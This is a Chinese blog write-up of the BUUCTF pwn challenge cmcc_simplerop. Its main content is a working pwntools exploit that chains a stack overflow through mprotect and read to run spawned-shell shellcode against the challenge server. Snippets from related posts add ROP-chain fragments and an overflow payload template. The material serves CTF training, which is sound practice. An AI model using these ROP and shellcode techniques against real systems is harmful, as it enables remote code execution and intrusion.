BUUCTF-PWN-cmcc_simplerop

最新推荐文章于 2022-03-17 22:48:05 发布
最新推荐文章于 2022-03-17 22:48:05 发布
阅读量540 收藏
点赞数
分类专栏: CTF PWN 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41743240/article/details/105808642
版权
本文详细介绍了如何利用ROP技术在BUUCTF-cmcc_simplerop题目中进行攻击。通过IDA反编译发现程序漏洞,使用mprotect方法修改bss段并执行shellcode,最终实现远程代码执行。文章提供了完整的exploit代码及执行效果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

BUUCTF-cmcc_simplerop

开了NX

 

IDA反编译

程序非常简单,漏洞也一眼可见

程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode

exploit:

#coding:utf-8
from pwn import *

#p=process('simplerop')
p=remote('node3.buuoj.cn',29617)
elf=ELF('simplerop')


#0x0809de85 : pop ebp ; pop esi ; pop edi ; ret
payload='a'*32+p32(elf.symbols['mprotect'])+p32(0x0809de85)+p32(0x080EB000)+p32(0x1000)+p32(0x7)+p32(elf.symbols['read'])+p32(0x0809de85)+p32(0)+p32(0x080EBF80)+p32(0x100)+p32(0x080EBF80)
p.sendlineafter('nput :',payload)
sleep(0.2)
payload=asm(shellcraft.sh())
p.sendline(payload)
p.interactive()

执行效果

 

 

 

 

 

 

 

 

 

BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 988
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
BUUCTFcmcc_simplerop(write up)
qq_44768749的博客
08-26 1056
BUUCTFcmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 614
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 499
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.youkuaiyun.com/mcmuyanga/article/details/109260008 文件名给了提示,使用
cmcc_simplerop
doudoudedi
02-20 1099
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p +...
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4448
BUUCTF刷题记录
CMCC--simplerop 题解
lifanxin的博客
03-28 1861
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1486
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.youkuaiyun.com/A951860555/article/details/115286266
pwncmcc_simplerop
Nothing
02-26 786
例行检查 ida打开二进制文件发现是静态链接的32位程序。main函数中存在溢出。用ROPgadget查找文件中的gadget。 ROPgadget --binary ./simplerop --only 'pop|ret' >> 1.txt 得到 发现存在 pop eax;ret pop edx;pop ecx;pop ebx;ret 这些就足够了,给寄存器赋值再用int 80...
cmcc Simplerop
Morphy_Amo的博客
03-17 4026
rop
[BUUCTF]PWN——CmmC_Simplerop
mcmuyanga的博客
11-07 311
cmcc_simplerop 附件 步骤 例行检查,32位,开启了nx保护 本地试运行一下程序,查看一下大概的情况 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序 参数v4明显的溢出漏洞 对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址, 在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprote
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值